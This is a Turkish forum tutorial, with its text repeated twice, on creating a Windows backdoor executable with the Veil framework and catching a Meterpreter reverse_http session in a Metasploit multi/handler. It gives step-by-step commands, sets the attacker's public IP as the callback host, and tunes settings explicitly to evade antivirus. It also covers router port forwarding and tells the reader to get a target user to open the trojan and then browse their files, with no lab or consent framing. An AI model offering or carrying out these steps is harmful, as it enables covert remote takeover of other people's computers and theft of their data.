Merhaba arkadaşlar bu gün Veil ile backdoor nasıl oluşturulur ve M3tasploit üzerinden nasıl kullanılır onu anlatmak istiyorum.
Veil, backdoor için kullanılan payloadları içinde hazır olarak bulunduran bir araçtır.
1-KURULUM
yazıp toolu Kali bilgisayarımıza indirelim.
yazıp Veil klasörü içindeki config klasörüne girelim ve setup.sh dosyasını çalıştıralım.
Continue with installation? sorusuna yes diyelim.
olarak devam edecek.
Burada Wine üzerinden Python kurulumu gerçekleştirecek. Çünkü Wine Windows uygulamalarını Linux üzerinde çalıştırmamıza yarar bundan dolayı Python un Windows sürümünü Kali bilgisayarımıza bir daha yükleyecek.
Finish diyelim.
Hemen ardından pywin32 ve pycrypto-2.6.1 kurlumu gelecek bunları da aynı şekilde next ve finish yapıp yükleyelim.
Bunların hemen ardından Ruby nin Windows sürümü kurulumu gelecek.
I accept the license ı işaretleyip next diyelim.
şeklinde bir uyarı verecek. Burada bize aynı klasörün mevcut olduğunu ve yine de yüklemek istiyor muyuz onu soracak. Yes diyelim ve Ruby nin kurulumunu gerçekleştirelim.
Bu sefer de AutoIt kurulumunu gerçekleştirmemizi isteyecek. AutoIt de bir programlama dilidir ve bunun için kurulum yapmamız gerek.
Next > I agree adımlarını takip edelim. Bizi böyle bir ekran karşılayacak
Burada sisteminiz eğer 32 bit ise x86yı 64 bit ise x64ü seçin.
Bu kısmı değişiklik yapmadan geçelim
Sonra next > next > install adımlarını takip edip kurulumu gerçekleştirelim.
Bütün kurulumlar bittiğinde bu ekran bizi bu ekran karşılayacak
cd yazıp klasörden çıkalım ve ardından:
diyelim.
bu da bittikten sonra aşağıda ki komutu çalıştıralım:
bunu da yaptıktan sonra bizi aşağıdaki gibi bir ekran karşılayacak
yazıp toolu başlatalım
Toolun giriş ekranı aşağıdaki gibidir
2-KULLANIM
yazıp Veili başlatalım.
Avaible tools kısmında bize mevcut araçları gösteriyor. Terminale
yazalım.
Açılan ekranda 41 adet payload olduğunu söylüyor. Payloadları görmek için:
yazalım.
Böyle bir liste gelecek. Buradan kullanmak istediğimiz payloadı seçiyoruz örnek olarak 9 numaralı payloadı seçeceğim.
Kullanacağımız payloadı seçtikten sonra gerekli ayarları yapmak için bir ekran gelecek
Burada düzenlememiz gereken kısımlar:
LHOST
PROCESSORS
SLEEP
LHOST=Eğer uzaktaki bir bilgisayara saldıracaksak public ipmizi(Public ipnizi öğrenmek için: IP Sorgulama - IP Adresi Sorgulama ve IP No Bul adresine bakabilirsiniz), aynı ağda bulunduğumuz bir bilgisayara saldırmak istiyorsak da local ip adresimizi yazmalıyız.
Sleep ve processors kısmlarını ise anti virüs programlarına yakalanmamak için kendimize göre düzenlememiz gerekiyor.
Düzenlemek için:
Gerekli ayarlamalardan sonra
yazıp backdoorumuzu oluşturalım.
Sonra bize oluşturduğumuz backdoor için ad soruyor herhangi bir şey yazın.
Backdoor oluşturduktan sonra modem ayarlarından port yönlendirmesi yapmamız gerek. Bunun için 192.168.1.1 yazıp modem ara yüzüne girmeliyiz. Sonra modemden port yönlendirme kısmına girip Kali bilgisayarımızda ki yerel ip adresimizi 8080 portuna yönlendirmeliyiz.
Port yönlendirmesini yaptıktan sonra M3tasploiti açalım ve M3tasploit başladıktan sonra aşağıdaki satıları yazalım:
Sonra payloadımızı seçelim
yazıp ayar ekranına gelelim.
Burada LHOSTa Kali bilgisayarımızda ki yerel ip adresimizi yazmalıyız.
Ayarlarımızı yaptıktan sonra exploit yazıp oluşturduğumuz trojani hedef bilgisayara atmalıyız.
Oluşturduğumuz trojani bulmak için var/lib/veil/output/compiled klasörüne gitmeliyiz.
Sonra oluşturduğumuz exe dosyasını hedef bilgisayarın kullanıcısına açtırıp M3tasploitden oturum gelmesini bekleyeceğiz. Sonra da Linux komutlarını kullanarak dosyalar arasında geçiş sağlayabiliriz.
Veil, backdoor için kullanılan payloadları içinde hazır olarak bulunduran bir araçtır.
1-KURULUM
Kod:
git clone https://github.com/Veil-Framework/Veil.gityazıp toolu Kali bilgisayarımıza indirelim.
Kod:
cd Veil/configyazıp Veil klasörü içindeki config klasörüne girelim ve setup.sh dosyasını çalıştıralım.
Continue with installation? sorusuna yes diyelim.
olarak devam edecek.
Burada Wine üzerinden Python kurulumu gerçekleştirecek. Çünkü Wine Windows uygulamalarını Linux üzerinde çalıştırmamıza yarar bundan dolayı Python un Windows sürümünü Kali bilgisayarımıza bir daha yükleyecek.
Finish diyelim.
Hemen ardından pywin32 ve pycrypto-2.6.1 kurlumu gelecek bunları da aynı şekilde next ve finish yapıp yükleyelim.
Bunların hemen ardından Ruby nin Windows sürümü kurulumu gelecek.
I accept the license ı işaretleyip next diyelim.
şeklinde bir uyarı verecek. Burada bize aynı klasörün mevcut olduğunu ve yine de yüklemek istiyor muyuz onu soracak. Yes diyelim ve Ruby nin kurulumunu gerçekleştirelim.
Bu sefer de AutoIt kurulumunu gerçekleştirmemizi isteyecek. AutoIt de bir programlama dilidir ve bunun için kurulum yapmamız gerek.
Next > I agree adımlarını takip edelim. Bizi böyle bir ekran karşılayacak
Burada sisteminiz eğer 32 bit ise x86yı 64 bit ise x64ü seçin.
Bu kısmı değişiklik yapmadan geçelim
Sonra next > next > install adımlarını takip edip kurulumu gerçekleştirelim.
Bütün kurulumlar bittiğinde bu ekran bizi bu ekran karşılayacak
cd yazıp klasörden çıkalım ve ardından:
Kod:
apt -y install veildiyelim.
bu da bittikten sonra aşağıda ki komutu çalıştıralım:
Kod:
/usr/share/veil/config/setup.sh --force --silentbunu da yaptıktan sonra bizi aşağıdaki gibi bir ekran karşılayacak
Kod:
cd Veil
./Veil.pyyazıp toolu başlatalım
Toolun giriş ekranı aşağıdaki gibidir
2-KULLANIM
Kod:
cd Veil
./Veil.pyyazıp Veili başlatalım.
Avaible tools kısmında bize mevcut araçları gösteriyor. Terminale
Kod:
use 1Açılan ekranda 41 adet payload olduğunu söylüyor. Payloadları görmek için:
Kod:
listyazalım.
Böyle bir liste gelecek. Buradan kullanmak istediğimiz payloadı seçiyoruz örnek olarak 9 numaralı payloadı seçeceğim.
Kullanacağımız payloadı seçtikten sonra gerekli ayarları yapmak için bir ekran gelecek
Burada düzenlememiz gereken kısımlar:
LHOST
PROCESSORS
SLEEP
LHOST=Eğer uzaktaki bir bilgisayara saldıracaksak public ipmizi(Public ipnizi öğrenmek için: IP Sorgulama - IP Adresi Sorgulama ve IP No Bul adresine bakabilirsiniz), aynı ağda bulunduğumuz bir bilgisayara saldırmak istiyorsak da local ip adresimizi yazmalıyız.
Kod:
set LHOST public ipnizSleep ve processors kısmlarını ise anti virüs programlarına yakalanmamak için kendimize göre düzenlememiz gerekiyor.
Düzenlemek için:
Kod:
set SLEEP atamak istediğiniz değer
set PROCESSORS atamak istediğiniz değerGerekli ayarlamalardan sonra
Kod:
generateyazıp backdoorumuzu oluşturalım.
Sonra bize oluşturduğumuz backdoor için ad soruyor herhangi bir şey yazın.
Backdoor oluşturduktan sonra modem ayarlarından port yönlendirmesi yapmamız gerek. Bunun için 192.168.1.1 yazıp modem ara yüzüne girmeliyiz. Sonra modemden port yönlendirme kısmına girip Kali bilgisayarımızda ki yerel ip adresimizi 8080 portuna yönlendirmeliyiz.
Port yönlendirmesini yaptıktan sonra M3tasploiti açalım ve M3tasploit başladıktan sonra aşağıdaki satıları yazalım:
Kod:
use exploit/multi/handlerSonra payloadımızı seçelim
Kod:
set PAYLOAD windows/meterpreter/reverse_http
Kod:
Show optionsyazıp ayar ekranına gelelim.
Burada LHOSTa Kali bilgisayarımızda ki yerel ip adresimizi yazmalıyız.
Kod:
set LHOST yerel ipmizAyarlarımızı yaptıktan sonra exploit yazıp oluşturduğumuz trojani hedef bilgisayara atmalıyız.
Oluşturduğumuz trojani bulmak için var/lib/veil/output/compiled klasörüne gitmeliyiz.
Sonra oluşturduğumuz exe dosyasını hedef bilgisayarın kullanıcısına açtırıp M3tasploitden oturum gelmesini bekleyeceğiz. Sonra da Linux komutlarını kullanarak dosyalar arasında geçiş sağlayabiliriz.
Son düzenleme:
